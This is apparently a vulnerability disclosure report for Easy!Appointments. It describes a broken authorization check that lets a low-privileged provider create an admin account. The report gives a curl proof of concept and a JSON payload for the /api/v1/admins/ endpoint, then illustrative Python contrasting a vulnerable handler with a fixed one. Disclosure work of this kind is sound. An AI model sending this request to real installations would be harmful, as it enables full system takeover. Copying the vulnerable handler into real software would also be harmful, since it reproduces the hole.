API Privilege Escalation in alextselegidis/easyappointments
Valid
Reported on Apr 15th 2022
Description
Privilege escalation occurs when a user gets access to more resources or functionality than they are normally allowed, and such elevation or changes should have been prevented by the application. This is usually caused by a flaw in the application.
In the Easy!Appointments API, authorization is checked only against the user's existence, without validating the user's permissions. As a result, a low-privileged user (e.g. a provider) can create a new admin user via the "/api/v1/admins/" endpoint and take over the system.
Proof of Concept
curl --request POST https://easyappointments.org/index.php/api/v1/admins/ -d @payload.json --user user:pass
payload.json
{
  "id": 100,
  "firstName": "Admin",
  "lastName": "Admin",
  "email": "admin@easyappointments.org",
  "mobile": null,
  "phone": "111",
  "address": null,
  "city": null,
  "state": null,
  "zip": null,
  "notes": null,
  "timezone": "UTC",
  "settings": {
    "username": "usern@me",
    "password": "p@ssw0rd",
    "notifications": true,
    "calendarView": "default"
  }
}
Impact
Full system takeover.
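The flaw described above is an authentication check standing in for an authorization check. The following added example (not Easy!Appointments code) models the two checks side by side: the vulnerable handler accepts any valid account for a POST to /api/v1/admins/, while the fixed handler also matches the caller's role against a per-resource write policy. The user table, the policy table and the SHA-256 password stand-in are constructed for the example.

```python
import base64
import hashlib
import hmac

# Constructed user table; "role" is the attribute the vulnerable check never consults.
# A real application would store a slow password hash (bcrypt/argon2), not SHA-256.
USERS = {
    "admin": {"pw_sha": hashlib.sha256(b"adminpass").hexdigest(), "role": "admin"},
    "provider": {"pw_sha": hashlib.sha256(b"pass").hexdigest(), "role": "provider"},
}

# Assumed policy: roles allowed to create/modify/delete each API resource.
WRITE_POLICY = {
    "/api/v1/admins/": {"admin"},
    "/api/v1/appointments/": {"admin", "provider"},
}

def authenticate(authorization_header):
    """Parse HTTP Basic credentials; return the user record or None."""
    scheme, _, encoded = authorization_header.partition(" ")
    if scheme.lower() != "basic":
        return None
    try:
        username, _, password = base64.b64decode(encoded).decode().partition(":")
    except (ValueError, UnicodeDecodeError):
        return None
    user = USERS.get(username)
    if user is None:
        return None
    given = hashlib.sha256(password.encode()).hexdigest()
    return user if hmac.compare_digest(given, user["pw_sha"]) else None

def handle_request_vulnerable(method, path, authorization_header):
    """Existence-only check: any authenticated account may POST to /api/v1/admins/."""
    if authenticate(authorization_header) is None:
        return 401
    return 201 if method == "POST" else 200

def handle_request_fixed(method, path, authorization_header):
    """Authenticate first, then authorize the caller's role for this resource."""
    user = authenticate(authorization_header)
    if user is None:
        return 401
    if method in ("POST", "PUT", "DELETE") and user["role"] not in WRITE_POLICY.get(path, set()):
        return 403  # authenticated but not permitted: the check that was missing
    return 201 if method == "POST" else 200

def basic(username, password):
    """Build an HTTP Basic Authorization header value."""
    return "Basic " + base64.b64encode(f"{username}:{password}".encode()).decode()
```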
Timeline
We are processing your report and will contact the alextselegidis/easyappointments team within 24 hours. (a year ago)
We have contacted a member of the alextselegidis/easyappointments team and are waiting to hear back. (a year ago)
We have sent a fix follow up to the alextselegidis/easyappointments team. We will try again in 7 days. (a year ago)
We have sent a second fix follow up to the alextselegidis/easyappointments team. We will try again in 10 days. (a year ago)
We have sent a third and final fix follow up to the alextselegidis/easyappointments team. This report is now considered stale. (a year ago)